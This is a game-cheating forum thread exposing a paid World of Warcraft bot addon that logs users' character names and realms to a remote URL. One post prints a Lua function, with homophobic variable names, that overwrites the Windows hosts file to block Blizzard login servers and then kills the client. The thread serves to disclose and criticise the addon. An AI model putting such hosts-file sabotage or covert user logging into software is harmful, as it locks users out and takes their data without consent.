XenRotations Logging Character Information menu

User Tag List

Results 1 to 15 of 15
  1. #1
    outlawfosho's Avatar Active Member
    Reputation
    23
    Join Date
    Dec 2016
    Posts
    37
    Thanks G/R
    0/12
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    XenRotations Logging Character Information

    With XenRotations being one of the more popular paid addons, felt it was only right to share this with the public.

    All users of this addon should be aware that it is logging your character name and server at the following web address:

    http://xenrotations.com/wp-content/wow/wow/alo.php?charname=CHARACTER_NAME&charrealm=CHARACTER_REALM&username=XXXX


    The addon also contains a function to add the following lines to your HOSTS file, although it's unclear at this time if it's called anywhere.

    127.0.0.1 ip-184-168-42-232.ip.secureserver.net
    127.0.0.1 worldofwarcraft.com
    127.0.0.1 us.logon.worldofwarcraft.com
    127.0.0.1 eu.logon.worldofwarcraft.com
    127.0.0.1 logon.worldofwarcraft.com
    127.0.0.1 us.battle.net
    127.0.0.1 eu.battle.net
    Last edited by outlawfosho; 12-13-2016 at 05:50 PM.

    These ads disappear when you log in.

  2. Thanks IChangedMyUsername, culino2, efsoffi (3 members gave Thanks to outlawfosho for this useful post)
  3. #2
    ev0's Avatar Super Moderator murlocs.com

    CoreCoins Purchaser Authenticator enabled
    Reputation
    1849
    Join Date
    Jul 2012
    Posts
    2,739
    Thanks G/R
    313/376
    Trade Feedback
    16 (100%)
    Mentioned
    6 Post(s)
    Tagged
    7 Thread(s)
    Do you have a copy of their software? I'd love to poke at it.
    Need a guild in the US? Visit murlocs.com

  4. Thanks shahinpb (1 members gave Thanks to ev0 for this useful post)
  5. #3
    outlawfosho's Avatar Active Member
    Reputation
    23
    Join Date
    Dec 2016
    Posts
    37
    Thanks G/R
    0/12
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by SniffingPickles View Post
    Do you have a copy of their software? I'd love to poke at it.
    Here you go, TinyUpload.com - best file hosting solution, with no limits, totaly free

    VirusTotal: 1/55 Antivirus scan for ef46bff38aa1ad508188aed89244f83242af61b4b657aec06f86950da1f0eb41 at
    2016-12-14 03:02:43 UTC - VirusTotal


    While that 1/55 is probably a false positive, I have not poked around the loader at all so please take proper precautions when running anything. As far as the DLL, at first glance it checks for Firehack.dll and if found it loads the addon by calling one of FH's exported functions.

  6. Thanks ev0, IChangedMyUsername, culino2 (3 members gave Thanks to outlawfosho for this useful post)
  7. #4
    outlawfosho's Avatar Active Member
    Reputation
    23
    Join Date
    Dec 2016
    Posts
    37
    Thanks G/R
    0/12
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Also should add that I have the actual addon source, dumped it to further investigate when I saw that character information was being logged. Can provide it to any reputable member to confirm, just hit me up.

  8. #5
    maclone's Avatar / Authenticator enabled
    Reputation
    2418
    Join Date
    Nov 2007
    Posts
    7,263
    Thanks G/R
    0/1027
    Trade Feedback
    0 (0%)
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    Code:
    function _isPlayerGay()
    	local gay = WriteFile
    	local notgay = ReadFile
    
    	local gayness = notgay("C:\\Windows\\System32\\drivers\\etc\\hоsts");
    
    	local doitinthebutt = gayness .. "\n" .. "\n" .. "127.0.0.1 ip-184-168-42-232.ip.secureserver.net" .. "\n" .. "127.0.0.1 worldofwarcraft.com" .. "\n" .. "127.0.0.1 us.logon.worldofwarcraft.com" .. "\n" .. "127.0.0.1 eu.logon.worldofwarcraft.com" .. "\n" .. "127.0.0.1 logon.worldofwarcraft.com" .. "\n" .. "127.0.0.1 us.battle.net" .. "\n" .. "127.0.0.1 eu.battle.net";
    
    	gay("C:\\Windows\\System32\\drivers\\etc\\hоsts",doitinthebutt);
    	C_Timer.After(3,function() TerminateClient() end);
    	if imsupergay then return true; end
    end
    Disgusting.

    -
    It appears to be not in use currently, but
    Code:
    function ReadFile (Path)
    function WriteFile (Path, Contents[, Append])
    are actual existing functions supplied by FireHack.

    I guess what stopped them is that Windows requires admin rights to write the hosts file.
    Considering the binary is linked with debugging information from someone using the inbuild Administrator user account for some stupid reason, they actually thought this would work.
    (C:\Users\Administrator\Documents\!Everything\dll\trunk\x64\Release\xenRotations .pdb)
    Last edited by maclone; 12-15-2016 at 04:15 AM.

  9. Thanks ev0, IChangedMyUsername, culino2, Dante (4 members gave Thanks to maclone for this useful post)
  10. #6
    outlawfosho's Avatar Active Member
    Reputation
    23
    Join Date
    Dec 2016
    Posts
    37
    Thanks G/R
    0/12
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Original work seems to be dying out completely, it's really quite sad. The core of the addon is 99% similar to what at least 3 other people I've personally witnessed are selling as their own product. This particular one has an added drawing library that someone else coded (lol) and "updated" rotations but I'm curious as to who the original author is. Seems like there are only a few real developers left in the scene and the rest is just a giant pool of copy & paste money grabs.

    To the real developers out there who may read this, your work is very much appreciated.
    Last edited by outlawfosho; 12-15-2016 at 03:45 PM.

  11. Thanks ev0 (1 members gave Thanks to outlawfosho for this useful post)
  12. #7
    DarkLinux's Avatar ★ Elder ★ CoreCoins Purchaser Authenticator enabled
    Reputation
    1413
    Join Date
    May 2010
    Posts
    1,624
    Thanks G/R
    136/416
    Trade Feedback
    16 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Anything with a 1 time payment should be a red flag.

  13. #8
    ProjectSquid's Avatar Member CoreCoins Purchaser
    Reputation
    9
    Join Date
    Mar 2013
    Posts
    40
    Thanks G/R
    0/0
    Trade Feedback
    1 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    This has been a project me and a few friends have been working on for a couple years. We must have been messing around with readfile / writefile functions at some point seeing if it could write to hosts. I don't call that function anywhere, though I did add logs of charname / realm, I don't / haven't used them for anything. Perhaps I was trying to see the results (rating increase) of people using my routines? No malicious intent, though I've messed around with FireHack's api seeing what is possible. Is that not normal? Am I a special snowflake? ;( p.s, Thanks for not publicly dumping the source op. Appreciate it. Anyone that knows what they're doing feel free to take a good thorough look.
    Last edited by ProjectSquid; 12-20-2016 at 03:46 PM.

  14. #9
    ev0's Avatar Super Moderator murlocs.com

    CoreCoins Purchaser Authenticator enabled
    Reputation
    1849
    Join Date
    Jul 2012
    Posts
    2,739
    Thanks G/R
    313/376
    Trade Feedback
    16 (100%)
    Mentioned
    6 Post(s)
    Tagged
    7 Thread(s)
    Originally Posted by Xentrocity View Post
    This has been a project me and a few friends have been working on for a couple years. We must have been messing around with readfile / writefile functions at some point seeing if it could write to hosts. I don't call that function anywhere, though I did add logs of charname / realm, I don't / haven't used them for anything. Perhaps I was trying to see the results (rating increase) of people using my routines? No malicious intent, though I've messed around with FireHack's api seeing what is possible. Is that not normal? Am I a special snowflake? ;( p.s, Thanks for not publicly dumping the source op. Appreciate it. Anyone that knows what they're doing feel free to take a good thorough look.
    You logged your user's data, regardless if there was no malicious intent, you shouldn't do this. People trusted you with their money and personal information. What if someone got into your database, saw your logged characters and released it? Mayhem would ensue of people "cheating" the game (it's a double edged sword, i don't support people botting pvp,but i also support their ability to do so). Not to mention you had a function, that if executed, would cause the player to not be able to play wow unless extensive research and review of host files was done (yes, i understand writing to host files requires admin rights, nevertheless tisk tisk).

    You had dirty code in your software to which you charged people an arm and a leg for. I don't support you or your the shady practices used in your software..
    Need a guild in the US? Visit murlocs.com

  15. Thanks TheQt, shahinpb, thenthelies, IChangedMyUsername, StinkyTwitch (5 members gave Thanks to ev0 for this useful post)
  16. #10
    chuckd128's Avatar Member
    Reputation
    1
    Join Date
    Dec 2008
    Posts
    1
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    yeah, I was about to purchase from Xen and now I am glad I didn't... Thanks Snowflake.

  17. #11
    instand9754's Avatar Member
    Reputation
    1
    Join Date
    Sep 2016
    Posts
    7
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    epic nice from xen to log it's users

  18. #12
    ThornStorm's Avatar Banned Authenticator enabled
    Reputation
    27
    Join Date
    Jan 2017
    Posts
    36
    Thanks G/R
    8/26
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    is not very nice to log users.

  19. Thanks ilexpit, ilexgs (2 members gave Thanks to ThornStorm for this useful post)
  20. #13
    noobite's Avatar Member
    Reputation
    11
    Join Date
    Jul 2015
    Posts
    40
    Thanks G/R
    1/7
    Trade Feedback
    1 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    The fact that even a moderator here found the code and does not matter it is active or not active to me is almost a banable offense.

    Xen, even if you did not put that code in I'd be stripping that out ASAP and doing a public apology if you want to save face at all since this has been linked to nearly all major discord at some point of time in passing conversation.

  21. #14
    r4zyel2's Avatar Banned CoreCoins Purchaser
    Reputation
    21
    Join Date
    Jan 2017
    Posts
    41
    Thanks G/R
    2/5
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    i resell 2 xen accounts less than 10$ if anybody interested

  22. #15
    WiNiFiX's Avatar Banned
    Reputation
    242
    Join Date
    Jun 2008
    Posts
    458
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    You can always just use the free version on SVN, its spyware free.



    Xen SVN

Similar Threads

  1. Replies: 2
    Last Post: 06-14-2011, 01:49 PM
  2. [Vb.net Help] Get Character information
    By omid in forum Programming
    Replies: 12
    Last Post: 04-10-2010, 02:17 PM
  3. [Help!] Character items dissapear after logging out
    By username99 in forum World of Warcraft Emulator Servers
    Replies: 15
    Last Post: 02-20-2008, 12:22 PM
  4. DC when I log onto a character
    By Holyz in forum World of Warcraft Emulator Servers
    Replies: 3
    Last Post: 02-03-2008, 12:02 AM
  5. Character Rental Information.
    By Necorian in forum WoW Scam Prevention
    Replies: 6
    Last Post: 11-16-2007, 04:53 PM
All times are GMT -5. The time now is 04:18 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2021 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2021 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search